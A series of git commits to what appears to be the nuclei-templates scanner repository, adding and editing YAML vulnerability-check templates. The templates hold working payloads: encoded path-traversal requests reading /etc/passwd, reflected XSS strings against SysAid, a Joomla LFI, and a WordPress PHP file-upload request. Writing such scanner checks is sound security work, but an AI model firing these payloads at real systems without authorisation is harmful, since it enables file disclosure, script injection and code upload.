cves/2020/CVE-2020-19283.yaml | 5 +++++ cves/2020/CVE-2020-19295.yaml | 5 +++++ 3 files changed, 15 insertions(+) diff --git a/cves/2020/CVE-2020-19282.yaml b/cves/2020/CVE-2020-19282.yaml index eaec870c63..729970b1ac 100644 --- a/cves/2020/CVE-2020-19282.yaml +++ b/cves/2020/CVE-2020-19282.yaml @@ -9,6 +9,11 @@ info: - https://github.com/zchuanzhao/jeesns/issues/11 - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 tags: cve,cve2020,jeesns,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-19282 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-19283.yaml b/cves/2020/CVE-2020-19283.yaml index 16a136f1ca..4bb18052e0 100644 --- a/cves/2020/CVE-2020-19283.yaml +++ b/cves/2020/CVE-2020-19283.yaml @@ -9,6 +9,11 @@ info: - https://github.com/zchuanzhao/jeesns/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2020-19283 tags: cve,cve2020,jeesns,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-19283 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-19295.yaml b/cves/2020/CVE-2020-19295.yaml index 0ec16465cd..d7a63db2d8 100644 --- a/cves/2020/CVE-2020-19295.yaml +++ b/cves/2020/CVE-2020-19295.yaml @@ -9,6 +9,11 @@ info: - https://github.com/zchuanzhao/jeesns/issues/21 - https://nvd.nist.gov/vuln/detail/CVE-2020-19295 tags: cve,cve2020,jeesns,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-19295 + cwe-id: CWE-79 requests: - method: GET From df59ad5670095d2caa77585da2ad82f7460b829b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 16:39:09 +0530 Subject: [PATCH 2395/4083] Update and rename ecoa-building-automation-lfd.yaml to vulnerabilities/other/ecoa-building-automation-lfd.yaml --- .../other/ecoa-building-automation-lfd.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) rename ecoa-building-automation-lfd.yaml => vulnerabilities/other/ecoa-building-automation-lfd.yaml (53%) diff --git a/ecoa-building-automation-lfd.yaml b/vulnerabilities/other/ecoa-building-automation-lfd.yaml similarity index 53% rename from ecoa-building-automation-lfd.yaml rename to vulnerabilities/other/ecoa-building-automation-lfd.yaml index c72945853f..24d0554968 100644 --- a/ecoa-building-automation-lfd.yaml +++ b/vulnerabilities/other/ecoa-building-automation-lfd.yaml @@ -1,9 +1,9 @@ id: ecoa-building-automation-lfd info: - name: "ECOA Building Automation System Local File Disclosure" + name: ECOA Building Automation System - LFD author: 0x_Akoko severity: high - reference: "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php" + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php tags: ecoa,lfi requests: @@ -14,7 +14,14 @@ requests: yr=2021&mh=6&fname=../../../../../../../../etc/passwd + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + condition: and + + - type: status + status: + - 200 From ffafbe02f6c44aeb22a98559eda295f0c2f59d93 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 17 Sep 2021 18:55:39 +0700 Subject: [PATCH 2396/4083] Create CVE-2021-30049.yaml --- cves/2021/CVE-2021-30049.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-30049.yaml diff --git a/cves/2021/CVE-2021-30049.yaml b/cves/2021/CVE-2021-30049.yaml new file mode 100644 index 0000000000..d026454ff6 --- /dev/null +++ b/cves/2021/CVE-2021-30049.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-30049 + +info: + name: SysAid Technologies 20.3.64 b14 Reflected XSS + author: daffainfo + severity: medium + description: SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI. + reference: + - https://eh337.net/2021/03/30/sysaid/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049 + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%22%3E%3Csvg%20onload%3Dalert%281%29%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 2bed4d9a92069dbd82a367f1e3532b53e3dcc24f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 17 Sep 2021 18:57:55 +0700 Subject: [PATCH 2397/4083] Update CVE-2021-30049.yaml --- cves/2021/CVE-2021-30049.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cves/2021/CVE-2021-30049.yaml b/cves/2021/CVE-2021-30049.yaml index d026454ff6..e10007469f 100644 --- a/cves/2021/CVE-2021-30049.yaml +++ b/cves/2021/CVE-2021-30049.yaml @@ -21,12 +21,10 @@ requests: part: body words: - "" - - type: word part: header words: - "text/html" - - type: status status: - 200 From 0d9d58a46bdb63f7f07fbc8d4b959705a0b89a3c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 17 Sep 2021 17:56:34 +0530 Subject: [PATCH 2398/4083] Update CVE-2021-30049.yaml --- cves/2021/CVE-2021-30049.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-30049.yaml b/cves/2021/CVE-2021-30049.yaml index e10007469f..8ec071104b 100644 --- a/cves/2021/CVE-2021-30049.yaml +++ b/cves/2021/CVE-2021-30049.yaml @@ -13,18 +13,20 @@ info: requests: - method: GET path: - - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%22%3E%3Csvg%20onload%3Dalert%281%29%3E' + - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word - part: body words: - - "" + - "" + part: body + - type: word part: header words: - "text/html" + - type: status status: - 200 From 1f833a4e2761fbbb0ad49e626a96aa6a2926fbea Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 17 Sep 2021 12:44:33 +0000 Subject: [PATCH 2399/4083] Auto Generated CVE annotations [Fri Sep 17 12:44:33 UTC 2021] :robot: --- cves/2021/CVE-2021-30049.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-30049.yaml b/cves/2021/CVE-2021-30049.yaml index 8ec071104b..5903e45821 100644 --- a/cves/2021/CVE-2021-30049.yaml +++ b/cves/2021/CVE-2021-30049.yaml @@ -9,6 +9,11 @@ info: - https://eh337.net/2021/03/30/sysaid/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049 tags: cve,cve2021,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-30049 + cwe-id: CWE-79 requests: - method: GET From 8369de26de5f8448f7b66bf0dafb8b2346e87837 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 17 Sep 2021 18:38:19 +0530 Subject: [PATCH 2400/4083] misc update --- cves/2021/CVE-2021-24499.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24499.yaml b/cves/2021/CVE-2021-24499.yaml index 849ea2760c..586961b2d7 100644 --- a/cves/2021/CVE-2021-24499.yaml +++ b/cves/2021/CVE-2021-24499.yaml @@ -28,14 +28,14 @@ requests: workreap_award_temp_file_uploader -----------------------------cd0dc6bdc00b1cf9 - Content-Disposition: form-data; name="award_img"; filename="cve2021.php" + Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php" Content-Type: application/x-httpd-php -----------------------------cd0dc6bdc00b1cf9-- - | - GET /wp-content/uploads/workreap-temp/cve2021.php HTTP/1.1 + GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and From 320919c177bc1713eeea83417b4b48ca6e4df02c Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 17 Sep 2021 18:47:28 +0530 Subject: [PATCH 2401/4083] Merge branch 'master' of https://github.com/meme-lord/nuclei-templates into pr/2566 --- cves/2021/CVE-2021-38314.yaml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-38314.yaml b/cves/2021/CVE-2021-38314.yaml index 1b3b9d061b..7e422dcf59 100644 --- a/cves/2021/CVE-2021-38314.yaml +++ b/cves/2021/CVE-2021-38314.yaml @@ -5,8 +5,8 @@ info: author: meme-lord severity: medium reference: - - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314 + - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314 tags: cve,cve2021,wordpress requests: @@ -14,16 +14,12 @@ requests: - | GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close - | GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close stop-at-first-match: true matchers-condition: and From a6fd22261a678834122aafaa5e0ac2fe434f35dd Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 17 Sep 2021 20:31:36 +0700 Subject: [PATCH 2402/4083] Create wuzhicms-detect.yaml --- technologies/wuzhicms-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/wuzhicms-detect.yaml diff --git a/technologies/wuzhicms-detect.yaml b/technologies/wuzhicms-detect.yaml new file mode 100644 index 0000000000..ef54b2627d --- /dev/null +++ b/technologies/wuzhicms-detect.yaml @@ -0,0 +1,24 @@ +id: wuzhicms-detect + +info: + name: Wuzhicms Detect + author: pikpikcu + severity: info + tags: tech,wuzhicms + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Powered by wuzhicms" + + - type: status + status: + - 200 From 3fb9dd230fec19b14d009b34bf3984e82be7062e Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 17 Sep 2021 19:19:05 +0530 Subject: [PATCH 2403/4083] readme update --- .github/scripts/README.tmpl | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index 0379c746d5..3bab5e61f1 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -67,12 +67,15 @@ Feel free to open a discussion on [Github discussions](https://github.com/projec 👨‍💻 Community ----- -You are welcome to join our [Discord Community](https://discord.gg/KECAGdH). -You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. +You are welcome to join the active [Discord Community](https://discord.gg/projectdiscovery) to discuss directly with project maintainers and share things with others around security and automation. +Additionally, you may follow us on [Twitter](https://twitter.com/pdnuclei) to be updated on all the things about Nuclei. -💡 Notes ------ -- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests. + + Thanks again for your contribution and keeping this community vibrant. :heart: From 32a4c77d2f446ed8910bb5e9d7cf21024015e879 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 17 Sep 2021 13:50:35 +0000 Subject: [PATCH 2404/4083] Auto Update README [Fri Sep 17 13:50:35 UTC 2021] :robot: --- README.md | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 802b16ad18..1513152e9e 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | cve2020 | 162 | princechaddha | 61 | file | 46 | | | | | | wp-plugin | 143 | pussycat0x | 58 | workflows | 36 | | | | | -**164 directories, 2090 files**. +**164 directories, 2104 files**. @@ -80,12 +80,15 @@ Feel free to open a discussion on [Github discussions](https://github.com/projec 👨‍💻 Community ----- -You are welcome to join our [Discord Community](https://discord.gg/KECAGdH). -You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. +You are welcome to join the active [Discord Community](https://discord.gg/projectdiscovery) to discuss directly with project maintainers and share things with others around security and automation. +Additionally, you may follow us on [Twitter](https://twitter.com/pdnuclei) to be updated on all the things about Nuclei. -💡 Notes ------ -- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests. + +

    + + + +

    Thanks again for your contribution and keeping this community vibrant. :heart: From d54ac9c3737550ff2d0fda9fde403dd82ace9c6f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 17 Sep 2021 20:54:56 +0700 Subject: [PATCH 2405/4083] Create gilacms-detect.yaml --- technologies/gilacms-detect.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 technologies/gilacms-detect.yaml diff --git a/technologies/gilacms-detect.yaml b/technologies/gilacms-detect.yaml new file mode 100644 index 0000000000..b948f5e152 --- /dev/null +++ b/technologies/gilacms-detect.yaml @@ -0,0 +1,26 @@ +id: gilacms-detect + +info: + name: GilaCMS Detect + author: pikpikcu + severity: info + tags: tech,gilacms + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/user" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Homepage | Gila CMS" + - "" + + - type: status + status: + - 200 From 2a1341274a2501ee7bcf360a7ee0feef52af7dbb Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 17 Sep 2021 21:04:21 +0700 Subject: [PATCH 2406/4083] Create luftguitar-arbitrary-file-upload.yaml --- .../luftguitar-arbitrary-file-upload.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml diff --git a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml new file mode 100644 index 0000000000..7b6cd0623b --- /dev/null +++ b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml @@ -0,0 +1,24 @@ +id: luftguitar-arbitrary-file-upload + +info: + name: Luftguitar CMS Arbitrary File Upload + author: pikpikcu + severity: high + tags: luftguitar + +requests: + - method: GET + path: + - "{{BaseURL}}/ftb.imagegallery.aspx " + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - 'ftb.imagegallery.aspx' + + - type: status + status: + - 200 From 7f5dd080ccf4f291a746ab34f1722ef11e2e9ff8 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 17 Sep 2021 10:00:22 -0500 Subject: [PATCH 2407/4083] Update shell-history.yaml Follow-up fix for comment in #2129 --- misconfiguration/shell-history.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/misconfiguration/shell-history.yaml b/misconfiguration/shell-history.yaml index cec582f3c6..a02b5b8389 100644 --- a/misconfiguration/shell-history.yaml +++ b/misconfiguration/shell-history.yaml @@ -40,6 +40,8 @@ requests: - type: word words: + - " Date: Fri, 17 Sep 2021 13:04:07 -0500 Subject: [PATCH 2408/4083] Update php-warning.yaml Fixes #2705 --- exposures/logs/php-warning.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/php-warning.yaml b/exposures/logs/php-warning.yaml index 51ee2cd270..ba326b9011 100644 --- a/exposures/logs/php-warning.yaml +++ b/exposures/logs/php-warning.yaml @@ -12,7 +12,7 @@ requests: path: - '{{BaseURL}}' - matchers-condition: or + matchers-condition: and matchers: - type: regex regex: From 8eea40d15c723abfd43678c9ba25c123f07e7fc9 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 17 Sep 2021 13:07:59 -0500 Subject: [PATCH 2409/4083] Update php-warning.yaml Additional status matcher --- exposures/logs/php-warning.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/logs/php-warning.yaml b/exposures/logs/php-warning.yaml index ba326b9011..4c35a35f47 100644 --- a/exposures/logs/php-warning.yaml +++ b/exposures/logs/php-warning.yaml @@ -21,3 +21,5 @@ requests: - type: status status: - 500 + - 503 + condition: or From ab63c58addfdeeb4868e74d70b3aacc188cec91f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 18 Sep 2021 07:26:30 +0700 Subject: [PATCH 2410/4083] Create CVE-2010-1315.yaml --- cves/2010/CVE-2010-1315.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1315.yaml diff --git a/cves/2010/CVE-2010-1315.yaml b/cves/2010/CVE-2010-1315.yaml new file mode 100644 index 0000000000..43663eef51 --- /dev/null +++ b/cves/2010/CVE-2010-1315.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1315 + +info: + name: Joomla! Component webERPcustomer - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11999 + - https://www.cvedetails.com/cve/CVE-2010-1315 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 63cc624c4affd1d88992b6d22eb503191c463803 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 18 Sep 2021 12:14:32 +0530 Subject: [PATCH 2411/4083] Update luftguitar-arbitrary-file-upload.yaml --- vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml index 7b6cd0623b..5e5b0d0864 100644 --- a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml +++ b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml @@ -18,6 +18,8 @@ requests: part: body words: - 'ftb.imagegallery.aspx' + - 'Image Gallery' + condition: and - type: status status: From 548b8a746b5ea4fae989af9ee63706b26a35fe2c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 18 Sep 2021 12:18:45 +0530 Subject: [PATCH 2412/4083] Update gilacms-detect.yaml --- technologies/gilacms-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/gilacms-detect.yaml b/technologies/gilacms-detect.yaml index b948f5e152..e2b3e5f0b5 100644 --- a/technologies/gilacms-detect.yaml +++ b/technologies/gilacms-detect.yaml @@ -18,8 +18,8 @@ requests: - type: word part: body words: - - "Homepage | Gila CMS" - - "" + - 'Homepage | Gila CMS' + - '' - type: status status: From fb1aee75cebc98591cc4c9786b0b4c42065beed4 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 18 Sep 2021 14:28:03 +0530 Subject: [PATCH 2413/4083] Update luftguitar-arbitrary-file-upload.yaml --- vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml index 5e5b0d0864..336bf079d0 100644 --- a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml +++ b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: high tags: luftguitar + reference: https://www.exploit-db.com/exploits/14991 requests: - method: GET @@ -17,9 +18,9 @@ requests: - type: word part: body words: - - 'ftb.imagegallery.aspx' + - 'Insert Image' - 'Image Gallery' - condition: and + condition: or - type: status status: From 8c281202184ca92261e0accd16aa0e51d3d2d705 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 18 Sep 2021 14:32:13 +0530 Subject: [PATCH 2414/4083] Update luftguitar-arbitrary-file-upload.yaml --- vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml index 336bf079d0..73c8f7c160 100644 --- a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml +++ b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/ftb.imagegallery.aspx " + - "{{BaseURL}}/ftb.imagegallery.aspx" matchers-condition: and matchers: From 50dfd3dc3d22cb4ca62450356da98a703c8ef7aa Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 18 Sep 2021 21:07:47 +0700 Subject: [PATCH 2415/4083] Update Severity --- vulnerabilities/other/php-zerodium-backdoor-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index 59fe7b7f44..6d4c304b0f 100644 --- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -4,7 +4,7 @@ info: name: PHP Zerodium Backdoor RCE author: dhiyaneshDk reference: https://news-web.php.net/php.internals/113838 - severity: high + severity: critical tags: php,backdoor requests: From 07115d4e12b86b365a2c93a4ddfd0f5fe6d46cdf Mon Sep 17 00:00:00 2001 From: Nuno Date: Sat, 18 Sep 2021 18:50:02 +0100 Subject: [PATCH 2416/4083] Adding Generic LFI Template --- exposures/files/generic-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposures/files/generic-lfi.yaml diff --git a/exposures/files/generic-lfi.yaml b/exposures/files/generic-lfi.yaml new file mode 100644 index 0000000000..4a3b283e3c --- /dev/null +++ b/exposures/files/generic-lfi.yaml @@ -0,0 +1,26 @@ +id: Generic-LFI + +info: + name: Generic Path Traversal + author: 0xSmiley + severity: high + description: The application exposes critically sensitive information to a user in an insecure manner. + tags: lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body \ No newline at end of file From 22f6285c505ffae72d5665c95720231b88d3f335 Mon Sep 17 00:00:00 2001 From: Nuno Date: Sat, 18 Sep 2021 19:04:15 +0100 Subject: [PATCH 2417/4083] Adding Generic LFI Template --- exposures/files/generic-lfi.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/exposures/files/generic-lfi.yaml b/exposures/files/generic-lfi.yaml index 4a3b283e3c..ec5062cc38 100644 --- a/exposures/files/generic-lfi.yaml +++ b/exposures/files/generic-lfi.yaml @@ -15,6 +15,10 @@ requests: - method: GET path: - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" matchers-condition: and matchers: - type: status From 083a72b24ccc2734c28928aa19e40f897ff2a6f0 Mon Sep 17 00:00:00 2001 From: Nuno Date: Sat, 18 Sep 2021 20:13:32 +0100 Subject: [PATCH 2418/4083] Generic Template Updated --- vulnerabilities/generic/generic-linux-lfi.yaml | 16 +++++++++++++--- 1 file changed, 13 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/generic/generic-linux-lfi.yaml b/vulnerabilities/generic/generic-linux-lfi.yaml index 20829a0aea..b326363614 100644 --- a/vulnerabilities/generic/generic-linux-lfi.yaml +++ b/vulnerabilities/generic/generic-linux-lfi.yaml @@ -2,7 +2,7 @@ id: generic-linux-lfi info: name: Generic Linux based LFI Test - author: geeknik,unstabl3,pentest_swissky,sushantkamble + author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley severity: high description: Searches for /etc/passwd on passed URLs tags: linux,lfi,generic @@ -44,10 +44,20 @@ requests: - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/?q=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/image?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/file?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/file?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/?q=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" stop-at-first-match: true matchers: - type: regex - words: + regex: - "root:.*:0:0:" part: body From dbbb2f9c70ff810992b5b49db935f4741bc6db66 Mon Sep 17 00:00:00 2001 From: Nuno Lopes <34580831+0xSmiley@users.noreply.github.com> Date: Sat, 18 Sep 2021 20:18:12 +0100 Subject: [PATCH 2419/4083] Delete generic-lfi.yaml --- exposures/files/generic-lfi.yaml | 30 ------------------------------ 1 file changed, 30 deletions(-) delete mode 100644 exposures/files/generic-lfi.yaml diff --git a/exposures/files/generic-lfi.yaml b/exposures/files/generic-lfi.yaml deleted file mode 100644 index ec5062cc38..0000000000 --- a/exposures/files/generic-lfi.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: Generic-LFI - -info: - name: Generic Path Traversal - author: 0xSmiley - severity: high - description: The application exposes critically sensitive information to a user in an insecure manner. - tags: lfi - classification: - cvss-metrics: 